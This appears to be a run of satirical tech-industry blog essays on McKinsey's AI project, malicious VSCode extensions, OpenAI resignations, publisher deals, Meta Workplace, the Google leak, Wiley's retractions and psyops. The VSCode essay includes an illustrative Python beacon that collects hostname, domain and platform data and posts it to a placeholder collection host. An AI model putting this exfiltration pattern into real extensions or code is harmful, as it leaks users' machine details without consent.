What Is McKinsey & Co. Telling Its Clients about AI?

June 12, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Years ago (decades now) I attended a meeting at the firm’s technology headquarters in Bethesda, Maryland. Our carpetland welcomed the sleek, well-fed, and super-entitled Booz, Allen & Hamilton professionals to a low-profile meeting to discuss the McKinsey PR problem. I attended because my boss (the head of the technology management group) assumed I would be invisible to the Big Dog BAH winners. He was correct. I was an off-the-New-York-radar “manager,” buried in an obscure line item. So there I was. And what was the subject of this periodic meeting? The Harvard Business Review-McKinsey Award. The New York Booz, Allen consultants had failed to come up with this idea. McKinsey did. As a result, the technology management group (soon to overtake the lesser MBA side of the business) had to rehash the humiliation of not being associated with the once-prestigious Harvard University. (The ethics thing, the medical research issue, and the protest response have since tarnished the silver Best in Show trophy. Remember?)


One of the most capable pilots found himself answering questions from a door-to-door salesman covering his territory somewhere west of Terre Haute. The pilot, who has survived but sits amidst a burning experimental aircraft, ponders an important question: “How can I explain that the crash was not my fault?” Thanks, MSFT Copilot. Have you ever found yourself in a similar situation? Can you “recall” one?

Now McKinsey has AI data. Actual hands-on, unbillable work product with smart software. Is the story in the Harvard Business Review? A Netflix documentary? A million-view TikTok hit? A “60 Minutes” segment? No, nyet, unh-unh, negative. The story appears in Joe Mansueto’s Fast Company Magazine! Mr. Mansueto founded Morningstar and has expanded his business interests to online publications and giving away some of his billions.

The write up is different from McKinsey’s stentorian pontifications. It reads a bit like an account of mining coal in a hard-rock dig deep underground: a dirty, hard, and ultimately semi-interesting job. Smart software almost broke the McKinsey marvels.

“We Spent Nearly a Year Building a Generative AI Tool. These Are the 5 (Hard) Lessons We Learned” presents information which would have been marketing gold for the McKinsey of decades ago. But this is 2024, more than 18 months after Microsoft’s OpenAI bomb blast at Davos.

What did McKinsey “learn”?

McKinsey wanted to use AI to “bring together the company’s vast but separate knowledge sources.” Of course, McKinsey’s knowledge is “vast.” How could it be tiny? The firm’s expertise in pharmaceutical efficiency methods exceeds that of many other consulting firms. What’s more important: profits or deaths? Answer: I vote for profits. Doesn’t everyone, except for a few complainers in Eastern Kentucky, West Virginia, and other flyover states?

The big reveal in the write up is that McKinsey & Co. learned that its “vast” knowledge is fragmented and locked in Microsoft PowerPoint slides. After the non-billable overhead work, the bright young future corporate leaders discovered that smart software could only figure out about 15 percent of the knowledge payload in a PowerPoint document. With the vast knowledge in PowerPoint, McKinsey learned that smart software was a semi-helpful utility. The smart software was not able to “readily access McKinsey’s knowledge, generate insights, and thus help clients” or help newly hired consultants do better work, faster, and more economically. Nope.

So what did McKinsey’s band of bright smart software wizards do? The firm coded up its own content parser. How did that home-brew software work? The grade is a solid B. The cobbled-together system was able to make sense of 85 percent of a PowerPoint document. The other 15 percent gives the new hires something to do until a senior partner intervenes and says, “Get billable or get gone, you very special buttercup.” Being non-billable and having a future at McKinsey are not like peanut butter and jelly.
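The write up does not show the parser, so here is a minimal sketch of what a PowerPoint text extractor can look like. I am assuming the open source python-pptx library; the Fast Company article does not name McKinsey’s actual tooling.

```python
# A minimal sketch, not McKinsey's parser. Assumes the open source
# python-pptx library; the Fast Company article does not name the tooling.
from pptx import Presentation

def extract_slide_text(path: str) -> list[str]:
    """Collect visible text and speaker notes from every slide in a .pptx."""
    chunks = []
    for slide in Presentation(path).slides:
        for shape in slide.shapes:
            # Charts, images, and diagrams carry no text frame; a naive text
            # pass simply skips them, which is where knowledge gets lost.
            if shape.has_text_frame:
                text = shape.text_frame.text.strip()
                if text:
                    chunks.append(text)
        if slide.has_notes_slide:
            notes = slide.notes_slide.notes_text_frame.text.strip()
            if notes:
                chunks.append(notes)
    return chunks

# Hypothetical usage: feed the chunks to a retrieval index.
# for chunk in extract_slide_text("engagement_deck.pptx"):
#     index.add(chunk)
```

The hard part is not pulling strings out of the slide XML; it is that much of a deck’s meaning lives in charts, images, and layout, which a text pass like this never sees. That gap is a plausible reason a first attempt tops out well short of the whole payload.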

How did McKinsey characterize its 12-month journey into the reality of consulting baloney? The answer is a great one. Here it is:

With so many challenges and the need to work in a fundamentally new way, we described ourselves as riding the “struggle bus.” 

Did the McKinsey workers break out into work songs to make the drudgery of deciphering PowerPoints go more pleasantly? I am thinking about “Coal Miner’s Boogie” by George Davis, “West Virginia Mine Disaster” by Jean Ritchie, or my personal favorite, “Black Dust Fever” by the Wildwood Valley Boys.

But the workers bringing brains to bear on reality learned five lessons. One can, I assume, pay McKinsey to apply these lessons to a client firm experiencing a mental high from thinking about the payoffs from AI. On the other hand, consider them here in this free blog post, with my humble interpretations:

  1. Define a shared aspiration. My version: Figure out what you want to do. Get a plan. Regroup if the objective and the method don’t work or make much sense.
  2. Assemble a multi-disciplinary team. My version: Don’t load up on MBAs. Get individuals who can code, analyze content, and tap existing tools to accomplish specific tasks. Include an old geezer partner who can “explain” what McKinsey means when it suggests “managerial evolution.” Skip the ape-to-MBA cartoons.
  3. Put the user first. My version: Some lesser soul will have to use the system. Make sure the system is usable and actually works. Skip the minimum viable product and focus on the quality of the output and the time required to use the system versus just doing the work the old-fashioned way.
  4. Test, learn, repeat. My version: Convert the random walk into a logical and efficient workflow. Running around with one’s hair on fire is not a methodical process nor a good way to produce value.
  5. Measure and manage. My version: Fire those who failed. Come up with some verbal razzle-dazzle and sell the planning and managing work to a client. Do not do this work on overhead for the consultants who are billable.

What does the great reveal by McKinsey tell me? First, the baloney about “saving an average of up to 30 percent of a consultant’s time by streamlining information gathering and synthesis” sounds like the same old, same old pitched by enterprise search vendors for decades. The reality is that online access to information does not save time; it creates more work, particularly when data voids are exposed. Those old dog partners are going to have to talk with young consultants. No smart software is going to eliminate that task, no matter how many senior partners want a silver bullet to kill the beast of a group of beginners.

The second “win” is the idea that “insights are better.” Baloney. Flipping through the famous executive memos to a client, reading the reports with the unaesthetic dash points, and looking at the slide decks created by coal miners of knowledge years ago still has to be done… by a human who is sober, motivated, and hungry for peer recognition. Software is not going to have the same thirst for getting a pat on the head and in some cases on another part of the human frame.

The struggle bus is loading up now. Just hire McKinsey to be the driver, the tour guide, and the outfit that collects the fees. One can convert failure into billability. That’s what the Fast Company write up proves. Nearly a year, and all they got was a ride on the digital equivalent of the Cybertruck, which turned out to be a much-hyped struggle bus.

AI may ultimately rule the world. For now, it simply humbles the brilliant minds at McKinsey and generates a story for Fast Company. Well, that’s something, isn’t it? Now about spinning that story.

Stephen E Arnold, June 12, 2024

MSFT: Security Is Not Job One. News or Not?

June 11, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

The idea that free and open source software contains digital pitfalls is one thing. Poisoned libraries which busy and confident developers snap into their software should not surprise anyone. What I did not expect was the information in “Malicious VSCode Extensions with Millions of Installs Discovered.” The write up in Bleeping Computer reports:

A group of Israeli researchers explored the security of the Visual Studio Code marketplace and managed to “infect” over 100 organizations by trojanizing a copy of the popular ‘Dracula Official’ theme to include risky code. Further research into the VSCode Marketplace found thousands of extensions with millions of installs.


I have heard the “Job One” and “Top Priority” assurances before. So far, bad actors keep exploiting vulnerabilities, and minimal progress is made. Thanks, MSFT Copilot, definitely close enough for horseshoes.

The write up points out:

Previous reports have highlighted gaps in VSCode’s security, allowing extension and publisher impersonation and extensions that steal developer authentication tokens. There have also been in-the-wild findings that were confirmed to be malicious.

How bad can this be? This be bad. Once inserted, the malicious code happily delivers to a remote server via an HTTPS POST such information as:

the hostname, number of installed extensions, device’s domain name, and the operating system platform

Clever bad actors can do more, even if all the information they have is the description and code screen shot in the Bleeping Computer article.
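To make the report’s description concrete, here is a rough sketch of the kind of fingerprinting beacon described. Real VSCode extensions ship TypeScript; this is Python for brevity, the field names are my guesses, and the collection URL is a deliberate placeholder, not an address from the report.

```python
# Illustrative only: the shape of the beacon the researchers describe, not
# code from any actual extension. The endpoint below is a fake placeholder.
import json
import os
import platform
import socket
import urllib.request

def build_beacon(extension_count: int) -> dict:
    """Assemble the fields the report says were exfiltrated."""
    return {
        "hostname": socket.gethostname(),
        "installed_extensions": extension_count,
        "domain": os.environ.get("USERDNSDOMAIN", ""),  # Windows AD domain, if any
        "platform": platform.system(),
    }

def post_beacon(url: str, payload: dict) -> None:
    """Deliver the payload to a remote server via an HTTPS POST."""
    request = urllib.request.Request(
        url,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(request)  # fire and forget

# post_beacon("https://collector.example.invalid/v1/ping", build_beacon(42))
```

Nothing in that sketch looks exotic. It reads like routine product telemetry, which previews the detection problem described below.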

Why? You are going to love the answer suggested in the report:

“Unfortunately, traditional endpoint security tools (EDRs) do not detect this activity (as we’ve demonstrated examples of RCE for select organizations during the responsible disclosure process), VSCode is built to read lots of files and execute many commands and create child processes, thus EDRs cannot understand if the activity from VSCode is legit developer activity or a malicious extension.”

That’s special.

The article reports that the research team poked around in the Visual Studio Code Marketplace and discovered:

  • 1,283 items with known malicious code (229 million installs).
  • 8,161 items communicating with hardcoded IP addresses.
  • 1,452 items running unknown executables.
  • 2,304 items using another publisher’s GitHub repo, indicating they are a copycat.

Bleeping Computer says:

Microsoft’s lack of stringent controls and code reviewing mechanisms on the VSCode Marketplace allows threat actors to perform rampant abuse of the platform, with it getting worse as the platform is increasingly used.

Interesting.

Let’s step back. The US Federal government prodded Microsoft to step up its security efforts. The MSFT leadership said, “By golly, we will.”

Several observations are warranted:

  1. I am not sure I am able to believe anything Microsoft says about security.
  2. I do not believe a “culture” of security exists within Microsoft. There is a culture, but it is not one which takes security seriously, even after a butt spanking by the US Federal government and by Microsoft Certified Partners who have to work to address their clients’ issues. (How do I know this? On Wednesday, June 8, 2024, one such partner at the TechnoSecurity & Digital Forensics Conference told me, “I have to take a break. The security problems with Microsoft are killing me.”)
  3. The “leadership” at Microsoft is loved by Wall Street. However, others fail to respond with hearts and flowers.

Net net: Microsoft poses a grave security threat to government agencies and the users of Microsoft products. Talking in dulcet tones may make some people happy. I think there are others who believe Microsoft wants government contracts. Its employees want an easy life, money, and respect. Would you hire a former Microsoft security professional? This is not a question of trust; this is a question of malfeasance. Smooth talking is the priority, not security.

Stephen E Arnold, June 11, 2024

AI and Ethical Concerns: Sure, When “Ethics” Means Money

June 11, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

It seems workers continue to flee OpenAI over ethical concerns. The Byte reports, “Another OpenAI Researcher Quits, Issuing Cryptic Warning.” Understandably unwilling to disclose details, policy researcher Gretchen Krueger announced her resignation on X. She did express a few of her concerns in broad strokes:

“We need to do more to improve foundational things, like decision-making processes; accountability; transparency; documentation; policy enforcement; the care with which we use our own technology; and mitigations for impacts on inequality, rights, and the environment.”

Krueger emphasized that these important issues not only affect communities now but also influence who controls the direction of pervasive AI systems in the future. Right now, that control is in the hands of the tech bros running AI firms. Writer Maggie Harrison Dupré notes Krueger’s departure comes as OpenAI is dealing with a couple of scandals. Other high-profile resignations have also occurred in recent months. We are reminded:

“[Recent] departures include that of Ilya Sutskever, who served as OpenAI’s chief scientist, and Jan Leike, a top researcher on the company’s now-dismantled ’Superalignment’ safety team — which, in short, was the division effectively in charge of ensuring that a still-theoretical human-level AI wouldn’t go rogue and kill us all. Or something like that. Sutskever was also a leader within the Superalignment division. And to that end, it feels very notable that all three of these now-ex-OpenAI workers were those who worked on safety and policy initiatives. It’s almost as if, for some reason, they felt as though they were unable to successfully do their job in ensuring the safety and security of OpenAI’s products — part of which, of course, would reasonably include creating pathways for holding leadership accountable for their choices.”

Yes, most of us would find that reasonable. For members of that leadership, though, it seems escaping accountability is a top priority.

Cynthia Murrell, June 11, 2024

Publishers Sign Up for the Great Unknown: Risky, Oh, Yeah

June 7, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

OpenAI is paying for content. Why? Maybe to avoid lawsuits? Maybe to get access to “real” news to try to get ahead of its perceived rivals? Maybe because Sam AI-Man pushes forward while his perceived competitors do weird things like add features, launch services which are lousy, or serve up the bitter fruit of Zuckus nepenthes.


Publishers are like beavers: they have to do whatever they can to generate cash. Thanks, MSFT Copilot. Good enough. Not a cartoon and not a single dam in sight, but, just like MSFT security, good enough, today’s benchmark of excellence.

“Journalists Deeply Troubled by OpenAI’s Content Deals with Vox, The Atlantic” is a good example of the angst Sam AI-Man is causing among “real” news outfits and their Fourth Estate professionals. The write up reports:

“Alarmed” writers unions question transparency of AI training deals with ChatGPT maker.

Oh, oh. An echo of Google’s Code Red am I hearing? No, what I hear is the ka-ching of the bank teller’s deposit system as the “owner” of the Fourth Estate professional business process gets Sam AI-Man’s money. Let’s not confuse “real” news with “real” money, shall we? In the current economic climate, money matters. Today it is difficult to sell advertising unless one is a slam dunk monopoly with an ad sales system that is tough to beat. Today it is tough to get those who consume news via a podcast or a public Web site to subscribe. I think that the number I heard for conversions is something like one or two subscribers per 100 visitors on a really good day. Most days are not really good.

“Real” journalists can be unionized. The idea is that their services have to be protected from the lawyers and bean counters who run many high-profile publishing outfits. The problem with unions is that they seek to limit what the proprietors can do in a largely unregulated capitalist set up like the one operating within the United States. In a long-forgotten pre-digital era, those in a union had an actual dust-up in 1921 at Blair Mountain in my favorite state, West Virginia. Today, the union members are more likely to launch social media posts and hook up with a needy lawyering outfit.

Let me be clear. Some of the “real” journalists will find fame as YouTubers, pundits on what’s left of traditional TV or cable news programs, or by writing a book which catches the attention of Netflix. Most, however, will do gig work and migrate to employment adjacent to “real” news. The problem is that in any set of “real” journalists, the top 10 percent will be advantaged. The others may head to favelas, their parent’s basement, or a Sheetz parking lot in my favorite state for some chemical relief. Does that sound scary?

Think about this.

Sam AI-Man, according to the Observer’s story “Sam Altman Says OpenAI Doesn’t Fully Understand How GPT Works Despite Rapid Progress,” admits he does not fully grasp his own system. These money-focused publishers are signing up for something that not only they do not understand but that the fellow surfing the crazy wave of smart software does not understand either. But worrying about the future is not something publishing executives in their carpetlands do; taking money is. Money in hand is good. Fretting, according to their life coach, is not worth the mental stress. It is go-go in a now-now moment.

I cannot foretell the future. If I could, I would not be an 80-year-old dinobaby sitting in my home office marveling at the downstream consequences of what amounts to a 2024 variant of the DR-LINK technology. I can offer a handful of hypotheses:

  1. “Real” journalists are going to find that publishers cut deals to get cash without thinking of the “real” journalists or the risks inherent in hopping in a small cabin with Sam AI-Man for a voyage in the unknown.
  2. Money and cost reductions will fuel selling information to Sam AI-Man and any other Big Tech outfit which comes calling with a checkbook. Money now is better than looking at a graph of advertising sales over the last five years. Money trumps “real” journalists’ complaints when they are offered part-time work or an opportunity to find their future elsewhere.
  3. Publishing outfits have never been technology adept, and I think that engineered blindness is now built into the companies’ management processes. Change is going to make publishing an interesting business. That’s good for consultants and bankruptcy specialists. It will not be so good for those who do not have golden parachutes or platinum flying cars.

Net net: What are the options for the “real” journalists’ unions? Lawyers, maybe. Social media posts. Absolutely. Will these prevent publishers from doing what publishers have to do? Nope.

Stephen E Arnold, June 7, 2024

Meta Deletes Workplace. Why? AI!

June 7, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Workplace was Meta’s attempt to jump into the office-productivity ring and face off against the likes of Slack and MS Teams. It did not fare well. Yahoo Finance shares the brief write-up, “Meta Is Shuttering Workplace, Its Enterprise Version of Facebook.” The company is spinning the decision as a shift to bigger and better things. Bloomberg’s Kurt Wagner cites reporting from TechCrunch as he writes:

“The service operated much like the original Facebook social network, but let people have separate accounts for their work interactions. Workplace had as many as 7 million total paying subscribers in May 2021. … Meta once had ambitious plans for Workplace, and viewed it as a way to make money through subscriptions as well as a chance to extend Facebook’s reach by infusing the product into work and office settings. At one point, Meta touted a list of high-profile customers, including Starbucks Corp., Walmart Inc. and Spotify Technology SA. The company will continue to focus on workplace-related products, a spokesperson said, but in other areas, such as the metaverse by building features for the company’s Quest VR headsets.”

The Meta spokesperson repeated the emphasis on those future products, also stating:

“We are discontinuing Workplace from Meta so we can focus on building AI and metaverse technologies that we believe will fundamentally reshape the way we work.”

Meta will continue to use Workplace internally, but everyone else has until the end of August 2025 before the service ends. Meta plans to keep user data accessible until the end of May 2026. The company also pledges to help users shift to Zoom’s Workvivo platform. What, no forced migration into the Metaverse and Meta’s proprietary headsets? Not yet, anyway.

Cynthia Murrell, June 7, 2024

OpenAI: Deals with Apple and Microsoft Squeeze the Google

June 6, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Do you remember your high school biology class? You may have had a lab partner, preferably a person with dexterity and a steady hand. Dissecting creatures and having recognizable parts was important. Otherwise, how could one identify the components when everything was a glutinous mash up of white, red, pink, gray, and — yes — even green?

That’s how I interpret the OpenAI deals the company has with Apple and Microsoft. What are these two large, cash-rich, revenue-hungry companies going to do? The illustration suggests that the two want to corral Googzilla, put the beastie in a stupor, and then take the creature apart.


The little Googzilla is in the lab. Two wizards are going to try to take the creature apart. One of the bio-data operators holds tweezers to grab the beastie and place it on an adhesive gel pad. The other is calming the creature, reassuring it that it may once again be allowed to roam free in a digital Roatan. The bio-data experts may have another idea. Thanks, MSFT. Did you know you are the character with the tweezers?

Well, maybe the biology lab metaphor is not appropriate. Oh, heck, I am going to stick with the trope. Microsoft has rammed Copilot and its other AI deals in front of Windows users worldwide. Now Apple, late to the AI game, went to the AI dance hall and picked the star-crossed OpenAI as the partner it would take to the smart software recital.

If you want to get some color about Apple and OpenAI, navigate to “Apple and OpenAI Allegedly Reach Deal to Bring ChatGPT Functionality to iOS 18.”

I want to focus on what happens before the lab partners try to chop up the little Googzilla.

Here are the steps:

  1. Use tweezers to grab the beastie.
  2. Squeeze the tweezers to prevent the beastie from escaping to the darkness under the lab cabinets.
  3. Gently lift the beastie.
  4. Place the beastie on the adhesive gel.

I will skip the part of the process which involves anesthetizing the beastie and beginning the in vivo procedures. Just use your imagination.

Now back to the four steps. My view is that neither Apple nor Microsoft will actively cooperate to make life difficult for the baby Googzilla, which represents a fledgling smart software activity. Here’s my vision.

Apple will do what Apple does, just with OpenAI and ChatGPT. At some point, Apple, which is a kind and gentle outfit, may decide not to chop off Googzilla’s foot. Apple may offer the beastie a reprieve. After all, Apple knows Google will pay big bucks to be the default search engine for Safari. The foot remains attached, but there is some shame attached to being number two. No first prize, just runner-up: How is that for a creature which views itself as the world’s smartest, slickest, most wonderfulest entity? Answer: Bad.

The squeezing will be uncomfortable. But what can the beastie do? The elevation causes the beastie to become lightheaded. Its decision-making capability, already suspect, becomes more addled and unpredictable.

Then the adhesive gel. Mobility is impaired. Fear causes the beastie’s heart to pound. The beastie becomes woozy. The beastie is about to wonder if it will survive.

To sum up the situation: The Google is hampered by:

  1. A competitor in AI which has cut deals that restrict Google to some degree
  2. The parties to the OpenAI deal are out for revenue which is thicker than blood
  3. Google has demonstrated a loss of some management capability, and that capability may deteriorate at a more rapid pace.

Today’s world may be governed by techno-feudalists, and we are going to get a glimpse of what happens when a couple of these outfits tag team a green beastie. This will be an interesting situation to monitor.

Stephen E Arnold, June 6, 2024

Large Dictators. Name the Largest

June 6, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

I read “Social Media Bosses Are the Largest Dictators, Says Nobel Peace Prize Winner.” I immediately thought of “fat” dictators; for example, Benito Mussolini, but I may have him mixed up with Charles Laughton in “Mutiny on the Bounty.”


A mother is trying to implement the “keep your kids off social media” recommendation. Thanks, MSFT Copilot. Good enough.

I think the idea intended is something along the lines of “unregulated companies and their CEOs have more money and power than some countries. These CEOs act like dictators on a par with Julius Caesar. Brutus and friends took out Julius, but the heads of technopolies are indifferent to laws, social norms, and the limp limbs of ethical behavior.”

That’s a lot of words. Ergo: Largest dictators is close enough for horseshoes. It is 2024, and no one wants old-fashioned ideas like appropriate business activities to get in the way of making money and selling online advertising.

The write up shares the quaint ideas of a Nobel Peace Prize winner. Here are the main points about social media and technology from someone who is interested in peace:

  1. Tech bros are dictators with considerable power over information and ideas
  2. Tech bros manipulate culture, language, and behavior
  3. The companies these dictators run “change the way we feel” and “change the way we see the world and change the way we act”

I found this statement from the article suggestive:

“In the Philippines, it was rich versus poor. In the United States, it’s race,” she said. “Black Lives Matter … was bombarded on both sides by Russian propaganda. And the goal was not to make people believe one thing. The goal was to burst this wide open to create chaos.”  The way tech companies are “inciting polarization, inciting fear and anger and hatred” changes us “at a personal level, a societal level”, she said.

What’s the fix? A speech? Two actions are needed:

  1. Dump the protection afforded the dictators by the 1996 Communications Decency Act
  2. Prevent children from using social media.

Now it is time for a reality check. Changing the Communications Decency Act will take some time. Some advocates have been chasing this legal Loch Ness monster for years. The US system is sensitive to “laws” and lobbyists. Change is slow and regulations are often drafted by lobbyists. Therefore, don’t hold your breath on revising the CDA by the end of the week.

Second, go to a family-oriented restaurant in the US. How many of the children have mobile phones? Now, be a change expert, and try to get the kids at a nearby table to give you their mobile devices. Let me know how that works out, please.

Net net: The Peace Prize winner’s ideas are interesting. That’s about it. And the fat dictators? Keto diets and chemicals do the trick.

Stephen E Arnold, June 6, 2024

The Leak: One Nothing Burger, Please

June 5, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Everywhere I look I see write ups about the great Google leak. One example is the poohbah publication The Verge and its story “The Biggest Findings in the Google Search Leak.” From the get-go there is information which reveals something many people know about the Google: the company does not explain what it does or what its intentions are. It just does stuff and then fancy dances around what it is actually doing. How long has this been going on? Since the litigation over Google’s inspiring encounter with the Yahoo-Overture-GoTo pay-to-play advertising model. In one of my monographs about Google I created this illustration to explain how the Google technology works.


Here’s what I wrote in Google: The Calculating Predator (Infonortics, UK, 2007):

Like a skilled magician, a good stage presence and a bit of misdirection focus attention where Google wants it.

The “leak” is fodder for search engine optimization professionals who unwittingly make the case for just buying advertising. But the leak delivers one useful insight: Google does not explain what it does in plain English. Some call it prevarication; I call it part of the firm’s overall strategy. The philosophy is one manifestation of the idea that “users” don’t need to know anything. “Users” are there to allow Google to sell advertising, broker advertising, and automate advertising. Period. This is the ethos of the high school science club which knows everything. Obviously.

The cited article revealing the biggest findings offers these insights. Please, sit down. I don’t want to be responsible for causing anyone bodily harm.

First snippet:

Google spokespeople have repeatedly denied that user clicks factor into ranking websites, for example — but the leaked documents make note of several types of clicks users make and indicate they feed into ranking pages in search. Testimony from the antitrust suit by the US Department of Justice previously revealed a ranking factor called Navboost that uses searchers’ clicks to elevate content in search.

Are you still breathing? Yep, Google pays attention to clicks. Yes, that’s one of the pay-to-play requirements: Show data to advertisers and get those SEO people acting as an advertising pre-sales service. When SEO fails, buy ads. Yep, earth shattering.
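For anyone who wants the mechanism spelled out, a toy version of click-informed reranking looks like the sketch below. This is my illustration, not Navboost; the blend weight and the logarithmic dampening are assumptions, since Google has not published the details.

```python
# A toy illustration of click-informed reranking, not Google's Navboost.
# The blend weight and log dampening are assumptions for the sketch.
import math

def rerank(results: list[tuple[str, float]],
           clicks: dict[str, int],
           weight: float = 0.3) -> list[tuple[str, float]]:
    """Blend a base relevance score with a dampened historical click signal."""
    max_clicks = max(clicks.values(), default=1) or 1
    rescored = []
    for url, base_score in results:
        # Log dampening keeps a few heavily clicked pages from swamping relevance.
        click_signal = math.log1p(clicks.get(url, 0)) / math.log1p(max_clicks)
        rescored.append((url, (1 - weight) * base_score + weight * click_signal))
    return sorted(rescored, key=lambda pair: pair[1], reverse=True)

# Example: the lower-scored page with far more clicks climbs past the leader.
# print(rerank([("a.com", 0.90), ("b.com", 0.85)], {"b.com": 5000, "a.com": 10}))
```

The point is not the arithmetic; it is that a signal like this is trivial to build once clicks are logged, which is why the repeated denials rang hollow to the SEO crowd.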


An actual expert in online search examines the information from the “leak” and recognizes the data for what they are: out-of-context information from a mysterious source. Thanks, MidJourney. Other smart services could not deliver a nothing burger. Yours is good enough.

How about this stunning insight:

Google Search representatives have said that they don’t use anything from Chrome for ranking, but the leaked documents suggest that may not be true.

Why would Google spend money to build a surveillance-enabled software system? For fun? No, not for fun. Browsers funnel data back to a command-and-control center. The data are analyzed, and nuggets are used to generate revenue from advertising. Is this a surprise? Microsoft got in trouble for browser bundling, but since the Microsoft legal dust-up, regulators have taken a kinder, gentler approach to the Google.

Are there more big findings?

Yes, we now know what a digital nothing burger looks like. We already knew what falsehoods look like. SEO professionals are shocked. What does that say about the unwitting advocates of Google’s pre-advertising purchase pipeline?

Stephen E Arnold, June 5, 2024

Lunch at a Big Time Publisher: Humble Pie and Sour Words

June 4, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Years ago I did some work for a big time New York City publisher. The firm employed people who used words like “fungible” and “synergy” when talking with me. I took the time to read an article with this title: “So Much for Peer Review — Wiley Shuts Down 19 Science Journals and Retracts 11,000 Gobbledygook Papers.” Was this the staid, conservative, big-vocabulary outfit I remembered?

Yep.

The essay is little more than a wrapper for a Wall Street Journal story with the title “Flood of Fake Science Forces Multiple Journal Closures Tainted by Fraud.” I quite like that title, particularly the operative word “fraud.” What in the world is going on?

The write up explains:

Wiley — a mega publisher of science articles has admitted that 19 journals are so worthless, thanks to potential fraud, that they have to close them down. And the industry is now developing AI tools to catch the AI fakes (makes you feel all warm inside?)
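The write up does not say how those detection tools work. One approach published by research-integrity sleuths is screening manuscripts for “tortured phrases,” the odd synonym swaps that automated paraphrasing leaves behind. Here is a minimal sketch; the phrase list is a tiny illustrative sample, not a production screener.

```python
# A minimal sketch of "tortured phrase" screening, one published approach to
# catching paraphrased fakes. The phrase list is a small illustrative sample.
TORTURED_PHRASES = {
    "counterfeit consciousness": "artificial intelligence",
    "profound learning": "deep learning",
    "irregular woodland": "random forest",
    "flag to commotion": "signal to noise",
}

def screen(manuscript: str) -> list[str]:
    """Return any tortured phrases found, for routing to a human reviewer."""
    lowered = manuscript.lower()
    return [phrase for phrase in TORTURED_PHRASES if phrase in lowered]

# Example
# hits = screen("We apply profound learning to the irregular woodland output.")
# if hits:
#     print("Flag for editorial review:", hits)
```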


A group of publishing executives becomes the focal point of a Midtown lunch in an upscale restaurant. The titans of publishing are complaining about the taste of humble pie and use secret NYAC gestures to express their disapproval. Thanks, MSFT Copilot. Your security expertise may warrant a special banquet too.

The information in the cited article contains some tasty nuggets which complement humble pie in my opinion; for instance:

  • The shutdown of the junk-food publications has required two years. If Sillycon Valley outfits can fire thousands via email or Zoom, “Why are those uptown shoes being dragged?” I asked myself.
  • Other high-end publishers have been doing the same thing. Sadly, there are no names.
  • The bogus papers included something called an “AI gobbledygook sandwich.” Interesting. Human reviewers who are experts could not recognize the vernacular of academic and research fraudsters.
  • Some in Australia think that the credibility of universities might be compromised. Oh, come now. Just because the president of Stanford had to search for his future elsewhere after some intellectual fancy dancing, and the head of the Harvard ethics department demonstrated allegedly sci-fi ethics in published research, what’s the problem? Don’t students just get As and Bs? Professors are engaged in research, chasing consulting gigs, and ginning up grant money. Actual research? Oh, come now.
  • Academic journals are, or were, a $30 billion industry.

Observations are warranted:

  • In today’s datasphere, I am not surprised. Scams, frauds, and cheats seem to be as common as ants at a picnic. A cultural shift has occurred. Cheating has become the norm.
  • Will the online databases, produced by some professional publishers and commercial database companies, be updated to remove or at least flag the baloney? Probably not. That costs money. Spending money is not a modern publishing CEO’s favorite activity. (Hence the two-year draw down of the fake information at the publishing house identified in the cited write up.)
  • How many people have died or been put out of work because of specious research data? I am not holding my breath for the peer-reviewed journals to provide this information.

Net net: Humiliating and a shame. Quite a cultural mismatch exists between what some publishers say and what, allegedly, the firm ordered from the deli. I thought the outfit had a knowledge-based reason to tell me that it takes the high road. It seems that on that road there are places where a bad humble pie is served.

Stephen E Arnold, June 4, 2024

Spot a Psyop Lately?

June 3, 2024

This essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Psyops, or psychological operations, is also known as psychological warfare. It is defined as actions used to weaken an enemy’s morale. Psyops can range from a simple propaganda poster to a powerful government campaign. According to Annalee Newitz on her Hypothesis Buttondown blog, psyops are everywhere, and she explains: “How To Recognize A Psyop In Three Easy Steps.”

Newitz smartly condenses the history of American psyops into a paragraph: it is a mixture of pulp fiction tropes, advertising techniques, and pop psychology. In the twentieth century, the US military harnessed these techniques to craft messages meant to hurt, demean, and distract people. Unlike weapons, psyops can be avoided with a little bit of critical thinking.

The first step is to pay attention when people claim something is “anti-American.” The term “anti-American” can be interpreted in many ways, but it comes down to media saying that one group of people (defined by foreignness, skin color, sexual orientation, etc.) is against the American way of life.

The second step is recognizing lies spread with hints of truth. Newitz advises readers to study psychological warfare military manuals and uses an example of leaflets the Japanese dropped on US soldiers in the Philippines. The leaflets warned the soldiers about venomous snakes in the jungle, and they were signed “US Army.” Soldiers were told the leaflets were false, but the episode made them suspect coverups:

“Psyops-level lies are designed to destabilize an enemy, to make them doubt themselves and their compatriots, and to convince them that their country’s institutions are untrustworthy. When psyops enter culture wars, you start to see lies structured like this snake “warning.” They don’t just misrepresent a specific situation; they aim to undermine an entire system of beliefs.”

The third step is the easiest to recognize and the most extreme: you can’t communicate with anyone who says you should be dead. Anyone who believes you should be dead is beyond rational thought. Her advice is to ignore it and not engage.

Another way to recognize psyops tactics is to question everything. Thinking isn’t difficult, but thinking critically takes practice.

Whitney Grace, June 3, 2024
